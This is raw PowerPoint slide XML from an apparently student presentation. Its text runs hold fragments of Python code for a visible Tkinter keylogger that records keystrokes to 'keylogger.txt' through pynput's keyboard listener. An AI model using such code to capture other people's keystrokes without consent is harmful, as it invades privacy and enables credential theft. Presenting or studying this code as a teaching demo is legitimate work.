            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12795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E2A3-77C7-CCFC-CAB4-6DAF56BBF1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="10681335" cy="4431983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>("Keylogger")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262508682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{8ACA4713-4F63-4AD3-8EA5-01052BA8B791}tf56160789_win32</Template>
  <TotalTime>2</TotalTime>
  <Words>828</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>75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Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Inter</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Custom</vt:lpstr>
      <vt:lpstr>PYLA JAGADEESH</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KUMAR KORNU</dc:creator>
  <cp:lastModifiedBy>GANESH KUMAR KORNU</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-13T08:57:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-13T08:59:19Z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